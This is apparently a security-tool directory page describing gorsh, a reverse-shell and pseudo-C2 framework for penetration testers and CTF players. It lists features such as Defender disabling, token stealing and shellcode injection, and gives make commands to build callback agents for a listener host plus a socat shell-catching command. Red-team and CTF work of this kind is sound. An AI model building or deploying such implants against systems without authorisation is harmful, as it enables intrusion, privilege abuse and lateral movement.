Primary Use Case

This tool is primarily used by penetration testers and red teamers to establish and manage reverse shell connections during engagements or CTF challenges. It facilitates multi-session management via tmux, supports advanced payload execution, and enables network pivoting through embedded Ligolo-ng tunnels.

Key Features

Tmux-driven pseudo-C2 interface with session and window management

Cross-platform agent generation for Windows, macOS, and Linux

Network scanner and Ligolo-ng tunnels for socks-less pivoting

Windows-specific features like Defender disabling, assembly execution, token stealing, and shellcode injection

Ability to embed and execute gzipped assemblies from SharpCollection

File upload/download support via an SMB server bridge

Tab completion and shell duplication with 'spawn' command

Non-Windows features including setuid spoofing and enumeration scripts (linpeas, linenum)

Insights & Recommendations

This tool is optimized for CTF and ease of use rather than stealth or advanced tradecraft. Users should have tmux installed for the best experience managing multiple shells. File transfers require setting up the included SMB server due to the reverse shell's stdin/stdout limitations. Windows-specific features require administrative privileges for full functionality. Proper certificate setup is needed if using socat for encrypted shell catching.

Installation

Set environment variables LHOST and LPORT for your listener host and port
Run `make windows LHOST=example.com LPORT=443` to generate Windows agent
Run `make macos LHOST=example.com LPORT=443` to generate macOS agent
Run `make linux LHOST=example.com LPORT=443` to generate Linux agent
Run `make server LPORT=443` to build the server binary
Run `make all LHOST=example.com LPORT=443` to build all components
Use `make listen LPORT=443` to start listening for incoming shells
Optionally run `make start-smb` to start the SMB server for file transfers
Use `make smblogs` to monitor SMB server logs

Usage

make {windows,macos,linux} LHOST=example.com LPORT=443

Generate platform-specific reverse shell agents with specified listener host and port

make server LPORT=443

Build the server binary listening on the specified port

make all LHOST=example.com LPORT=443

Build all agents and server binaries with given host and port

make listen LPORT=443

Start the server to catch incoming reverse shells on the specified port

socat -d -d OPENSSL-LISTEN:443,reuseaddr,cert=certs/server.pem,verify=0,fork READLINE

Alternative method to catch shells without using gorsh-server or tmux

make start-ligolo

Prepare interfaces and run Ligolo-ng for socks-less pivoting tunnels

pivot

Run from an agent to initiate a callback to the Ligolo-ng interface for routing

make start-smb

Start the SMB server to enable file upload/download bridging

make smblogs

View logs of SMB server activity to monitor callbacks

make list-assemblies

List available gzipped assemblies from SharpCollection for embedding

make choose-assemblies

Interactively select assemblies to embed in the implant using fzf

Smart Usage Notes

Integrate gorsh with Metasploit or Cobalt Strike for automated exploitation and post-exploitation workflows.Leverage tmux-driven session management to improve multi-host engagement efficiency during red team operations.Use embedded assembly execution to bypass network restrictions by avoiding external payload hosting.Incorporate network scanning and Ligolo-ng tunnels for stealthy pivoting and lateral movement in complex environments.Deploy as part of purple team exercises to simulate advanced persistent threat behaviors and improve detection capabilities.

OpenSec Atlas

gorsh

About This Tool

Primary Use Case

Key Features

Insights & Recommendations

Installation

Usage

Smart Usage Notes

Security Capability Profile

Tags

You Might Also Like